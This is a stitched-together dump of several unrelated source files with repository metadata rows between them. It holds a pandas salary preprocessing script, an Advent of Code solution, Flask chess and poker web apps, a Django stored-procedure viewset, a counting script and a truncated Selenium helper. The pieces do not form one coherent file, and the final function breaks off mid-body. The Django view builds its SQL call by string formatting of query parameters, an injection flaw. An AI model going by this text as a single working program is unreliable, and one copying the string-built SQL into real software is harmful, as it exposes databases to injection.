# relocation willingness using the function 'get_relocation'
data['Relocation'] = data['Город, переезд, командировки'].apply(get_relocation)
data['Business_trip'] = data['Город, переезд, командировки'].apply(get_bisiness_trips)
# Delete the original feature 'Город, переезд, командировки'
data.drop(['Город, переезд, командировки'], axis=1, inplace=True)
# Features for employment type: full time, part time, project, volunteering, internship.
employment_types = ['полная занятость', 'частичная занятость', 'проектная работа', 'волонтерство', 'стажировка']
for i in employment_types:
data[i] = data['Занятость'].apply(lambda x: True if i in x else False)
data = data.rename(columns={
'полная занятость':'full_time',
'частичная занятость':'part_time',
'проектная работа':'project',
'стажировка':'internship',
'волонтерство':'volunteering'
})
# Features for schedule types: full_time, flexible, remote, daily_shifts, long_shifts.
schedule = ['полный день', 'гибкий график', 'удаленная работа', 'сменный график', 'вахтовый метод']
# Features for schedule
for j in schedule:
data[j] = data['График'].apply(lambda x: True if j in x else False)
data = data.rename(columns={
'полный день':'full_time',
'гибкий график': 'flexible',
'удаленная работа':'remote',
'сменный график': 'daily_shifts',
'вахтовый метод':'long_shifts'
})
# Delete original features
data.drop(['Занятость', 'График' ], axis=1, inplace=True)
# Change feature «Обновление резюме» format to datetime.
data['date'] = pd.to_datetime(data['Обновление резюме'], dayfirst=False).dt.date
# Creation of a new features: 'currency' and 'salary_national' (for salary expectations in national currencies)
data['currency'] = data['ЗП'].apply(get_currency_in_ISO_format)
data['salary_national'] = data['ЗП'].apply(lambda x: x.split(' ')[0]).astype('int64')
# Reading the currency base
Exchange_Rates = pd.read_csv('data/ExchangeRates.zip')
# change date format to datetime
Exchange_Rates['date'] = pd.to_datetime(Exchange_Rates['date'], dayfirst=True).dt.date
# merging of database 'date' and columns of 'Exchange_Rates':'currency', 'date', 'close', 'proportion'
data_merged = data.merge(
Exchange_Rates[['currency', 'date', 'close', 'proportion']],
left_on=['date','currency'],
right_on=['date','currency'],
how='left'
)
# Filling ruble to ruble rate as 1.
data_merged['close'] = data_merged['close'].fillna(1)
data_merged['proportion'] = data_merged['proportion'].fillna(1)
# Calculation of salary in rubles
data_merged['salary(rub)'] = data_merged['salary_national'] * data_merged['close'] / data_merged['proportion']
# Delete original features 'ЗП_сумма', 'ЗП', 'currency', 'Обновление резюме', 'close', 'proportion'
data_merged.drop(['salary_national', 'ЗП', 'currency', 'Обновление резюме', 'close', 'proportion'], axis=1, inplace=True)
data_merged['Relocation_and_business_trip_status'] = data_merged[['Relocation','Business_trip']].apply(lambda x: get_aggregated_status(*x), axis=1)
#--------------Data cleaning--------
data = data_merged
print(f'Inintal number of entries: {data.shape[0]}')
dupl_columns = list(data.columns)
mask_duplicated = data.duplicated(subset=dupl_columns)
print(f'Number of repeating lines: {data[mask_duplicated].shape[0]}')
# Delete repeating lines
data_deduplicated = data_merged.drop_duplicates(subset=dupl_columns)
print(f'Number of rows without duplicates: {data_deduplicated.shape[0]}')
# Estimation of missing values
cols_null_sum = data_deduplicated.isnull().sum()
cols_with_null = cols_null_sum[cols_null_sum > 0].sort_values(ascending=False)
# Remove rows in features 'Последнее/нынешнее место работы' and 'Последняя/нынешняя должность'.
data_deduplicated = data_deduplicated.dropna(subset=['Последнее/нынешнее место работы','Последняя/нынешняя должность'], how='any', axis=0)
# The dictionnary to fill missing values
values = {
'User_experience(months)': data_deduplicated['User_experience(months)'].median()
}
#Fill the missing values
data_deduplicated = data_deduplicated.fillna(values)
# Filtering salaries lower than 1000 and higher than 1 million rubles
mask_salary_filter = (data_deduplicated['salary(rub)'] > 1e6) | (data_deduplicated['salary(rub)'] < 1e3)
# Outliers
print(f"Number of outliers: {data_deduplicated[mask_salary_filter].shape[0]}")
# Filter entries using "mask_salary_filter"
data_deduplicated.drop(data_deduplicated[mask_salary_filter].index, axis=0, inplace=True)
# Filtering entries where user experience exceed user age
mask_experience_equal_to_age = (data_deduplicated['User_experience(months)'] / 12 > data_deduplicated['Age']) & (data_deduplicated['Age'] / 12 < data_deduplicated['User_experience(months)'])
# Outliers that stands outside of the boundary
print(f"Outliers: {data_deduplicated[mask_experience_equal_to_age].shape[0]}")
# Filtering outliers by "mask_experience_equal_to_age"
data_deduplicated.drop(data_deduplicated[mask_experience_equal_to_age].index, axis=0, inplace=True)
#remove candidates whose age exceed the range [-3*sigma; +4*sigma]
log_data = data_deduplicated['Age'] #normal scale
left = 3
right = 4
lower_bound = log_data.mean() - left * log_data.std()
upper_bound = log_data.mean() + right * log_data.std()
outliers, cleaned = outliers_z_score_mod(data_deduplicated, 'Age', left=3, right=4, log_scale=False)
# Delete outliers
data_deduplicated.drop(outliers.index, axis='index', inplace=True)
# Data encoding----------------------------------
# Let us split users by possession of auto feature: set '1' who does have an auto and '0' for those who does not
data_deduplicated['auto'] = data_deduplicated['Авто'].apply(lambda x: 1 if x.find('Имеется собственный автомобиль')>=0 else 0)
# let us drop original feature
data_deduplicated.drop(['Авто'], axis=1, inplace=True)
# Let us identify most frequent user positions and delete minor deviations in titles
data_deduplicated['position'] = data_deduplicated['Последняя/нынешняя должность'].apply(get_profession)
#delete original feature
data_deduplicated.drop(['Последняя/нынешняя должность', 'Последнее/нынешнее место работы','Ищет работу на должность:','date'], axis=1, inplace=True)
#delete original features without preprocessing
#data_deduplicated.drop(['Последнее/нынешнее место работы','Ищет работу на должность:','date'], axis=1, inplace=True)
# Encoding-----
data_encoded = pd.get_dummies(data_deduplicated, columns=['Education', 'Gender', 'City', 'Relocation_and_business_trip_status','position',
'Business_trip', 'full_time', 'part_time', 'project', 'volunteering', 'internship', 'full_time', 'flexible', 'remote', 'daily_shifts', 'long_shifts', 'Relocation',
])
# Initiate the RobustScaler()
r_scaler = preprocessing.RobustScaler()
# copy original dataset
df_r = r_scaler.fit_transform(data_encoded[['Age', 'User_experience(months)']]) #'salary(rub)'
#Transform the features for visualization
df_r = pd.DataFrame(df_r, columns=['Age_n', 'User_experience(months)_n']) #'salary(rub)'
# Add transformed features to the Dataframe
data_encoded = data_encoded.join(df_r, how='left') #on='mukey'
# Delere original features without normalization
data_encoded.drop(['Age', 'User_experience(months)'], axis=1, inplace=True)
# Delete rows with missed data
data_encoded = data_encoded.dropna(how='any', axis=0)
# copy dataframe
data_prepared = data_encoded.copy()
#--------Models---------
# Create two matrixes: features and target
X, y = data_prepared.drop('salary(rub)', axis=1, ), data_prepared['salary(rub)']
# Split the data in a ratio 80/20
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=config.random_seed)
# check the shape
print(f'X_Train: {X_train.shape} y_train: {y_train.shape}')
print(f' X_Test: {X_test.shape}, y_test: {y_test.shape}')
# # Get a logarythm of train data
# y_train_log = np.log(y_train)
# # Creation of an isntance of the linear model class wtith the L2-regularization with the best alpha-coefficient
# ridge_lr = linear_model.Ridge(alpha=config.alpha)
# # Train the model to predict log target values
# ridge_lr.fit(X_train_scaled_poly, y_train_log)
# #Make a prediction for train and test samples and get expanential data
# y_train_pred = np.exp(ridge_lr.predict(X_train_scaled_poly))
# y_test_pred = np.exp(ridge_lr.predict(X_test_scaled_poly))
# # Calculate metrics
# print_metrics(y_train, y_train_pred, y_test, y_test_pred) | Alex1iv/Deposit-subscription | utils/functions.py | functions.py | py | 20,460 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.reader_config.config_reader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.NA",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "numpy.NaN",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "numpy... |
31008817167 | import itertools
from collections import deque
def surrounding(input, x, y):
    """Return the in-bounds 8-connected neighbours of cell (x, y).

    Candidates are emitted in a fixed order: the four orthogonal
    neighbours first, then the four diagonals.
    """
    rows, cols = len(input), len(input[x])
    candidates = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1),
                  (x - 1, y + 1), (x + 1, y + 1), (x - 1, y - 1), (x + 1, y - 1)]
    neighbours = []
    for cx, cy in candidates:
        if 0 <= cx < rows and 0 <= cy < cols:
            neighbours.append((cx, cy))
    return neighbours
def surrounding2(input, x, y):
    """Alternative neighbour finder: scan the 3x3 box around (x, y).

    Produces the same cells as ``surrounding`` but in row-major order,
    skipping (x, y) itself and anything outside the grid.
    """
    height = len(input)
    width = len(input[x])
    return [(cx, cy)
            for cx in range(x - 1, x + 2)
            for cy in range(y - 1, y + 2)
            if 0 <= cx < height and 0 <= cy < width and (cx, cy) != (x, y)]
def read_input_file(input_file):
    """Parse *input_file* into a grid: one row per line, one int per digit."""
    with open(input_file) as fh:
        return [[int(ch) for ch in row] for row in fh.read().splitlines()]
def update_energy(input_data):
    """Advance the octopus grid by one step (AoC 2021 day 11), in place.

    Every cell gains 1 energy; cells reaching 10 "flash" and propagate
    +1 to their neighbours via a work queue (each cell flashes at most
    once per step).  Flashed cells are reset to 0 at the end.

    Returns the mutated grid and the number of flashes this step.
    """
    flashed = set()          # cells that already flashed this step
    flash_que = deque()      # cells pending an energy bump / flash check
    total_flashes = 0
    # increase energy level of all octopus with 1
    for x_i, row in enumerate(input_data):
        for y_i, elem in enumerate(row):
            input_data[x_i][y_i] += 1
            if input_data[x_i][y_i] >= 10:
                flash_que.append([x_i, y_i])
    # Drain the queue: each pop adds +1, and a cell crossing 10 flashes
    # once and enqueues its not-yet-flashed neighbours.
    # NOTE(review): cells enqueued by the initial pass receive an extra
    # +1 when popped; they are already >= 10 and get reset to 0 below,
    # so the step outcome appears unaffected -- TODO confirm.
    while flash_que:
        (x_i, y_i) = flash_que.pop()
        input_data[x_i][y_i] += 1
        if (x_i, y_i) in flashed:
            continue
        else:
            if input_data[x_i][y_i] >= 10:
                flashed.add((x_i, y_i))
                total_flashes += 1
                flash_que.extend(
                    [(x_j, y_j) for (x_j, y_j) in surrounding(input_data, x_i, y_i) if (x_j, y_j) not in flashed])
    # Reset every cell that exceeded 9 back to 0 for the next step.
    for x_i, row in enumerate(input_data):
        for y_i, elem in enumerate(row):
            if input_data[x_i][y_i] > 9:
                input_data[x_i][y_i] = 0
    return input_data, total_flashes
if __name__ == '__main__':
    # This is day11 part1 and part2
    filename = "input/input11.txt"
    data = read_input_file(filename)
    # Total cell count; a step where every cell flashes means the grid
    # is fully synchronized (part 2 stop condition).
    number_of_octopus = len(data) * len(data[0])
    total_amount_of_flashes = 0
    # Simulate up to 4999 steps, printing the grid after each one.
    for step in range(1, 5000):
        output, number_of_flashes_per_step = update_energy(data)
        print(f'After step {step}, number of flashes in this step: {number_of_flashes_per_step}')
        total_amount_of_flashes += number_of_flashes_per_step
        for el in output:
            print(el)
        if number_of_flashes_per_step == number_of_octopus:
            print(f'synchronized at step {step}')
            break
    print(f'total amount of flashes: {total_amount_of_flashes}')
| CvanderStoep/adventofcode2021 | day11.py | day11.py | py | 2,587 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.product",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 31,
"usage_type": "call"
}
] |
70644132584 | import flask_session
import flask_mail
from flask import Flask, render_template, redirect, request, jsonify, escape
from apscheduler.schedulers.background import BackgroundScheduler
from . import helpers, database, handle_errors, user, games
from . import handle_move, chat
# Flask application object; the config keys below are consumed by
# flask_mail and flask_session.
app = Flask(__name__)
# Change depending on your mail configuration.
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = 'chesscorpy@gmail.com'
# NOTE(review): placeholder credential -- supply the real secret via an
# environment variable rather than committing it to source control.
app.config['MAIL_PASSWORD'] = '***'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
# Server-side sessions stored on the local filesystem.
app.config['SESSION_TYPE'] = 'filesystem'
mail = flask_mail.Mail(app)
flask_session.Session(app)
def handle_timeouts_wrap():
    """Allow for the call of mail in check_games under app context."""
    # games.handle_timeouts sends mail, which needs an active app context.
    with app.app_context():
        games.handle_timeouts(mail)
# Set up the job that checks for timed out games.
# Runs handle_timeouts_wrap every 30 seconds on a background thread.
game_check_job = BackgroundScheduler()
game_check_job.add_job(handle_timeouts_wrap, 'interval', seconds=30)
game_check_job.start()
def index():
"""Displays the homepage if user is not logged in,
otherwise display user page.
"""
if user.logged_in():
return render_template(
'/index_loggedin.html',
user_data=user.get_data_by_id(user.get_logged_in_id()))
else:
return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Allows a new user to register."""
if user.logged_in():
return redirect('/')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
email = request.form.get('email')
notifications = 0 if not request.form.get('notifications') else 1
rating = user.set_rating(request.form.get('rating', type=int))
errors = handle_errors.for_register(username, password, email, rating)
if errors:
return errors
user.create(username, password, email, rating, notifications)
user.auto_login(username)
return redirect('/')
else:
return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Allows a user to login."""
if user.logged_in():
return redirect('/')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
errors = handle_errors.for_login_input(username, password)
if errors:
return errors
user_ = user.get_data_by_name(username, ['id', 'username', 'password'])
errors = handle_errors.for_login_sql(user_, password)
if errors:
return errors
user.create_session(user_['id'])
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
@helpers.login_required
def logout():
    """Logs a user out by discarding the session, then redirects home."""
    user.delete_session()
    return redirect('/')
@app.route('/profile')
@helpers.login_required
def profile():
    """Displays the profile of the user given by the ``id`` query arg."""
    user_id = request.args.get('id', type=int)
    user_data = user.get_data_by_id(user_id)
    if not user_data:
        return helpers.error('That user does not exist.', 400)
    return render_template('profile.html', user_data=user_data)
@app.route('/opengames')
@helpers.login_required
def opengames():
    """List open game requests.

    With a truthy ``direct`` query argument, show requests aimed
    directly at the current user; otherwise show public requests.
    """
    fetch = (games.get_direct_requests if request.args.get('direct')
             else games.get_public_requests)
    return render_template('opengames.html', games=fetch())
@app.route('/newgame', methods=['GET', 'POST'])
@helpers.login_required
def newgame():
    """Allows users to create a game request.

    GET renders the form (pre-filling the opponent name from the
    ``username`` query arg, defaulting to a public request); POST
    validates the form and stores the request.
    """
    if request.method == 'POST':
        username = request.form.get('username').lower()
        color = request.form.get('color')
        turnlimit = request.form.get('turnlimit', type=int)
        minrating = request.form.get('minrating', type=int)
        maxrating = request.form.get('maxrating', type=int)
        # Checkbox: absent -> 0, any value -> 1.
        is_public = 0 if not request.form.get('public') else 1
        errors = handle_errors.for_newgame_input(username, color, turnlimit,
                                                 minrating, maxrating)
        if errors:
            return errors
        games.create_request(user.get_logged_in_id(),
                             games.get_opponent_id(username), turnlimit,
                             minrating, maxrating, color, is_public)
        return redirect('/opengames')
    else:
        if request.args.get('username'):
            username = request.args.get('username')
        else:
            username = 'Public'
        return render_template('newgame.html', username=username)
@app.route('/start')
@helpers.login_required
def start():
    """Creates a game from a game request (``id`` query arg).

    The request must exist and be accessible to the current user;
    otherwise the user is redirected home.  On success the request is
    consumed and the user lands on the new game's board.
    """
    request_id = request.args.get('id', type=int)
    if not request_id:
        return redirect('/')
    game_request = games.get_request_data_if_authed(request_id,
                                                    user.get_logged_in_id())
    if not game_request:
        return redirect('/')
    # Resolve which player plays white/black from the request's color
    # preference.
    white_id, black_id = helpers.determine_player_colors(
        game_request['color'], game_request['user_id'],
        user.get_logged_in_id())
    game_id = games.create_game(white_id, black_id,
                                game_request['turn_day_limit'],
                                game_request['public'])
    games.delete_request(request_id)
    return redirect(f'/game?id={game_id}')
@app.route('/game')
@helpers.login_required
def game():
    """Generates a game board based on the status of the game and
    allows user to make moves.

    Augments the raw game row with display names and the viewer's
    color ('white'/'black', or 'none' for spectators).
    """
    game_id = request.args.get('id', type=int)
    game_data = games.get_game_data_if_authed(game_id, user.get_logged_in_id())
    if not game_data:
        return redirect('/')
    game_data = database.row_to_dict(game_data)
    game_data['player_white_name'] = user.get_data_by_id(
        game_data['player_white_id'], ['username'])['username']
    game_data['player_black_name'] = user.get_data_by_id(
        game_data['player_black_id'], ['username'])['username']
    if game_data['player_white_id'] == user.get_logged_in_id():
        game_data['my_color'] = 'white'
    elif game_data['player_black_id'] == user.get_logged_in_id():
        game_data['my_color'] = 'black'
    else:
        game_data['my_color'] = 'none'
    return render_template('game.html', game_data=game_data)
@app.route('/activegames')
@helpers.login_required
def activegames():
    """Show the active games of a user.

    Viewing one's own page with a truthy ``my_move`` query arg narrows
    the list to games where it is the viewer's turn.
    """
    own_id = user.get_logged_in_id()
    user_id = request.args.get('id', type=int) if request.args.get('id') else own_id
    is_own_page = (user_id == own_id)
    if request.args.get('my_move') and is_own_page:
        active = games.get_active_games_to_move(user_id)
    else:
        active = games.get_active_games(user_id)
    username = user.get_data_by_id(user_id, ['username'])['username']
    return render_template('activegames.html',
                           games=games.format_active_games(active),
                           username=username, my_games=is_own_page)
@app.route('/history')
@helpers.login_required
def history():
    """Displays the game history of the user given by the ``id`` arg."""
    user_id = request.args.get('id', type=int)
    user_ = user.get_data_by_id(user_id, ['username'])
    if not user_:
        return helpers.error('That user does not exist.', 400)
    username = user_['username']
    # Only games the current viewer is allowed to see are returned.
    games_ = games.get_game_history_if_authed(user_id, user.get_logged_in_id())
    return render_template('history.html',
                           games=games.format_game_history(games_),
                           username=username)
@app.route('/settings', methods=['GET', 'POST'])
@helpers.login_required
def settings():
    """Allows user to change settings (currently: mail notifications)."""
    if request.method == 'POST':
        # Checkbox: absent -> 0, any value -> 1.
        notify = 0 if not request.form.get('notifications') else 1
        user.update_settings(user.get_logged_in_id(), notify)
        return redirect('/')
    else:
        notify = int(user.get_data_by_id(user.get_logged_in_id(),
                                         ['notifications'])['notifications'])
        return render_template('settings.html', notify=notify)
@app.route('/move', methods=['GET', 'POST'])
@helpers.login_required
def move_request():
    """Processes a move request for a game by a user.

    Returns JSON ``{"successful": bool}``; GET requests just redirect.
    """
    if request.method == 'POST':
        game_id = request.form.get('id', type=int)
        move = request.form.get('move')
        game_data = games.get_game_data_if_to_move(game_id,
                                                   user.get_logged_in_id())
        # Don't let user move in an already completed game
        # or game they are not a player of.
        if not game_data or not move or (
                game_data['status'] != games.Status.NO_MOVE
                and game_data['status'] != games.Status.IN_PROGRESS
        ):
            return jsonify(successful=False)
        # Need app context for process_move to send mail.
        with app.app_context():
            move_success = handle_move.process_move(
                move, database.row_to_dict(game_data), mail)
        return jsonify(successful=move_success)
    else:
        return redirect('/')
@app.route('/chat', methods=['GET', 'POST'])
@helpers.login_required
def handle_chat():
    """Sends (POST) or retrieves (GET) chat messages for a game."""
    if request.method == 'GET':
        return jsonify(chat.get_chats(request.args.get('id', type=int)))
    else:
        game_id = request.form.get('game_id', type=int)
        user_id = request.form.get('user_id', type=int)
        # escape() prevents HTML injection when the message is rendered.
        msg = escape(request.form.get('msg'))
        # Reject missing fields, over-long messages, spoofed user ids,
        # and games the sender cannot access.
        if (not game_id or not user_id or not msg
                or len(msg) > chat.CHAT_MSG_MAX_LEN
                or user_id != user.get_logged_in_id()
                or not games.get_game_data_if_authed(game_id, user_id, False)):
            return jsonify(successful=False)
        chat.new_chat(game_id, user_id, msg)
        return jsonify(successful=True)
| kurtjd/chesscorpy | chesscorpy/app.py | app.py | py | 10,426 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask_mail.Mail",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "flask_session.Session",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "apscheduler.schedul... |
23991293206 | from flask import Flask, render_template, request, Response, redirect, url_for, flash
import mysql.connector
import os
import requests
from sklearn import svm
# Train an SVM poker-hand classifier at import time.  Each training line
# holds 10 feature columns (read below as ints) followed by a label in
# column 10.  NOTE(review): presumably the UCI "Poker Hand" dataset
# (5 suit/value pairs per hand) -- confirm against the data file.
train_data = []
train_labels = []
with open('poker-hand-training-true.data', 'r') as train_file:
    for line in train_file:
        current_line = line.rstrip('\n')
        data = current_line.split(',')
        hand_data = []
        for i in range(10):
            hand_data.append(int(data[i]))
        train_labels.append(int(data[10]))
        train_data.append(hand_data)
classifier = svm.SVC()
classifier.fit(train_data, train_labels)
app = Flask(__name__)
# Database credentials come from the environment; a single module-level
# connection/cursor pair is shared by all request handlers.
host = os.environ.get('MYSQL_HOST')
database = os.environ.get('MYSQL_DATABASE')
password = os.environ.get('MYSQL_PASSWORD')
user = os.environ.get('MYSQL_USER')
cnx = mysql.connector.connect(host=host, database=database, user=user, password=password)
cursor = cnx.cursor()
@app.route('/index')
def index():
    """List all players; the template iterates the cursor's rows."""
    query = 'SELECT * FROM players;'
    cursor.execute(query)
    return render_template('index.html', cursor=cursor)
@app.route('/add')
def add():
    """Render the add-player form (submits to /post)."""
    return render_template('add.html')
@app.route('/post', methods=['POST'])
def post():
    """Insert a new player from the submitted form, then show the list.

    The insert is committed immediately: mysql.connector runs with
    autocommit off by default, and previously the only commit happened
    at interpreter shutdown, so inserts were invisible/lost on crash.
    """
    name = request.form['name']
    country = request.form['country']
    query = 'INSERT INTO players (name, country) VALUES (%s, %s);'
    data = (name, country)
    cursor.execute(query, data)
    cnx.commit()  # persist now rather than at shutdown
    return redirect('/index')
@app.route('/delete', methods=['POST'])
def delete():
    """Delete a player by name, then show the list.

    Commits immediately (mysql.connector autocommit is off by default;
    see the matching fix in post()).
    """
    name = request.form['name']
    query = 'DELETE FROM players WHERE name=%s;'
    cursor.execute(query, (name,))
    cnx.commit()  # persist now rather than at shutdown
    return redirect('/index')
@app.route('/details')
def details():
    """Show a player's details enriched with country and daylight info.

    Looks the player up by the ``name`` query arg, fetches country data
    from restcountries.eu and sunrise/sunset times from
    sunrise-sunset.org.  NOTE(review): the restcountries.eu v2 endpoint
    has been retired -- verify these URLs still resolve.
    """
    name = request.args.get('name')
    query = 'SELECT * FROM players WHERE name=%s;'
    cursor.execute(query, (name,))
    data = cursor.fetchone()
    if data:
        # Column 1 of the players row is the country name.
        player_country = data[1]
        country_json = requests.get('https://restcountries.eu/rest/v2/name/' + player_country + '?fullText=true')
        if country_json.status_code == 404:
            # Unknown country: render the page with placeholder values.
            continent = 'unknown continent'
            code = 'US'
            capital = 'unknown capital'
            population = 'unknown population'
            flag = ''
            return render_template('details.html',
                                   name=name,
                                   country=player_country,
                                   continent=continent,
                                   capital=capital,
                                   population=population,
                                   flag=flag)
        country = country_json.json()
        continent = country[0]['region']
        code = country[0]['alpha2Code']
        capital = country[0]['capital']
        population = country[0]['population']
        flag = 'https://www.countryflags.io/' + code + '/shiny/64.png'
        if capital == '':
            capital = 'unknown capital'
        # Pad latlng so missing coordinates fall back to 'unknown'.
        latitude_longitude = country[0]['latlng']
        latitude_longitude.append('unknown')
        latitude_longitude.append('unknown')
        latitude = latitude_longitude[0]
        longitude = latitude_longitude[1]
        sunlight_json = requests.get('https://api.sunrise-sunset.org/json?lat=' + str(latitude) + '&lng=' + str(longitude))
        sunlight_data = sunlight_json.json()
        sunrise = 'unknown'
        sunset = 'unknown'
        if sunlight_data['status'] == 'OK':
            sunrise = sunlight_data['results']['sunrise']
            sunset = sunlight_data['results']['sunset']
        return render_template('details.html',
                               name=name,
                               country=player_country,
                               continent=continent,
                               capital=capital,
                               population=population,
                               flag=flag,
                               sunrise=sunrise,
                               sunset=sunset)
    else:
        return redirect('/error')
@app.route('/play')
def play():
    """Render the play page with the current number of registered players."""
    cursor.execute('SELECT COUNT(name) from players;')
    (player_count,) = cursor.fetchone()
    return render_template('play.html', number_of_players=player_count)
@app.route('/game')
def game():
    """Deal five cards to every registered player and rank the hands.

    A fresh deck is shuffled via the Deck of Cards API, each player
    draws five cards, the hands are encoded into the numeric format the
    SVM classifier was trained on (suit code then value code per card),
    and the predicted hand classes determine the winner(s); ties share
    the win.
    """
    # Map API suit/value strings to the integer codes of the training
    # data (values 1-13, suits 1-4).  Suit and value strings never
    # collide, so one lookup table replaces the former 17-branch
    # if/elif chain; unknown strings are skipped, as before.
    card_codes = {
        'ACE': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7,
        '8': 8, '9': 9, '10': 10, 'JACK': 11, 'QUEEN': 12, 'KING': 13,
        'HEARTS': 1, 'SPADES': 2, 'DIAMONDS': 3, 'CLUBS': 4,
    }
    deck_data = requests.get('https://deckofcardsapi.com/api/deck/new/shuffle')
    deck = deck_data.json()
    deck_id = deck['deck_id']
    cursor.execute('SELECT COUNT(name) from players;')
    number_of_players = cursor.fetchone()[0]
    hands = []        # per player: [suit, value, suit, value, ...]
    card_images = []  # per player: list of 5 card image URLs
    for _ in range(number_of_players):
        hand_json = requests.get(
            'https://deckofcardsapi.com/api/deck/' + deck_id + '/draw/?count=5').json()
        hand = []
        hand_images = []
        for j in range(5):
            card = hand_json['cards'][j]
            hand.append(card['suit'])
            hand.append(card['value'])
            hand_images.append(card['image'])
        hands.append(hand)
        card_images.append(hand_images)
    # Encode every hand for the classifier.
    translated_hands = [[card_codes[c] for c in hand if c in card_codes]
                        for hand in hands]
    # Highest predicted hand class wins; equal predictions share the win.
    winners = []
    best_hand = 0
    predictions = classifier.predict(translated_hands)
    for i, prediction in enumerate(predictions):
        if prediction > best_hand:
            best_hand = prediction
            winners = [i]
        elif prediction == best_hand:
            winners.append(i)
    return render_template('game.html', hands=hands, winners=winners,
                           card_images=card_images,
                           number_of_players=number_of_players)
@app.route('/error')
def error():
    """Render the generic error page."""
    return render_template('error.html')
if __name__ == '__main__':
    app.run(debug=True)
    # Cleanup after the dev server stops: wipe the players table and
    # close the shared connection.  NOTE(review): this DELETE discards
    # all rows on shutdown -- confirm that is intentional.
    query = 'DELETE FROM players;'
    cursor.execute(query)
    cnx.commit()
    cursor.close()
    cnx.close()
{
"api_name": "sklearn.svm.SVC",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "sklearn.svm",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_nu... |
16574373936 | from typing import List
class NumArray:
    """Answer immutable range-sum queries in O(1) after an O(n)
    prefix-sum precomputation (LeetCode 303).
    """

    def __init__(self, nums: List[int]):
        """Precompute prefix sums so prefSum[i] == sum(nums[:i + 1])."""
        from itertools import accumulate  # local import; module deps unchanged
        self.prefSum = list(accumulate(nums))

    def sumRange(self, left: int, right: int) -> int:
        """Return sum(nums[left:right + 1]), 0 <= left <= right < len(nums)."""
        lower = self.prefSum[left - 1] if left > 0 else 0
        return self.prefSum[right] - lower
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(left,right) | BLANK00ANONYMOUS/PythonProjects | Leetcode Daily Challenges/18_feb_2023.py | 18_feb_2023.py | py | 522 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
}
] |
24094667127 | from django.db import connection
from rest_framework import viewsets, status
from rest_framework.response import Response
from apps.motivos.api.serializers import MotivosListSerializer
class MotivosListViewSet(viewsets.GenericViewSet):
    """List "motivos" (reasons) for a service/client pair.

    Calls the ``AppCA_ListarMotivos`` stored procedure and serializes
    the resulting (codigo, area) rows.
    """
    serializer_class = MotivosListSerializer

    def list(self, request):
        """Handle GET.  Required query params: ``idServicio``, ``idCliente``.

        Returns 200 with serialized rows, 302 when the procedure yields
        no rows, 400 on missing/empty parameters and 500 on serializer
        errors (status codes preserved from the original).
        """
        with connection.cursor() as cursor:
            params = self.request.query_params.dict()
            if not params:
                return Response({
                    'error': 'Por favor enviar los parametros requeridos'
                }, status=status.HTTP_400_BAD_REQUEST)
            # .get() instead of [] so a missing key yields a 400 response
            # rather than an unhandled KeyError (HTTP 500).
            idServicio = params.get('idServicio')
            idCliente = params.get('idCliente')
            if not idServicio or not idCliente:
                return Response({
                    'error': 'Se necesitan los dos parametros solicitados'
                }, status=status.HTTP_400_BAD_REQUEST)
            # Parameterized call: the previous str.format() interpolation
            # injected raw query-string values into the SQL text and was
            # vulnerable to SQL injection.
            cursor.execute(" [dbo].[AppCA_ListarMotivos] %s, %s ",
                           [idServicio, idCliente])
            areas_data = cursor.fetchall()
            if not areas_data:
                return Response({'message': 'no hay data en la consulta'},
                                status=status.HTTP_302_FOUND)
            data = [{'codigo': row[0], 'area': row[1]} for row in areas_data]
            area_serializer = self.get_serializer(data=data, many=True)
            if area_serializer.is_valid():
                return Response(area_serializer.data, status=status.HTTP_200_OK)
            return Response(area_serializer.errors,
                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)
{
"api_name": "rest_framework.viewsets.GenericViewSet",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "apps.motivos.api.serializers.MotivosListSerializer",
"line_number": 8,
... |
70562622184 | import sys
from collections import Counter
input = sys.stdin.readline
# N cards owned, then the cards; M query values, then the queries.
# (`input` was rebound to sys.stdin.readline above for fast reads.)
N = int(input())
ary = list(map(int, input().rstrip().split()))
M = int(input())
condition = list(map(int, input().rstrip().split()))
# Count occurrences once so every query is an O(1) lookup.
counter_dict = Counter(ary)
for num in condition:
    # Counter returns 0 for values that never appeared.
    print(counter_dict[num], end=' ')
{
"api_name": "sys.stdin",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "collections.Counter",
"line_number": 11,
"usage_type": "call"
}
] |
8556430888 | from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.common.by import By
import time
import chromedriver_autoinstaller
# Auto-download chromedriver, set Chrome options, and create a browser window.
def create_chrome():
    """Return a Chrome WebDriver (incognito, maximized, no-sandbox),
    installing a matching chromedriver into ./ first.
    """
    chromedriver_autoinstaller.install("./")
    chrome_options = Options()
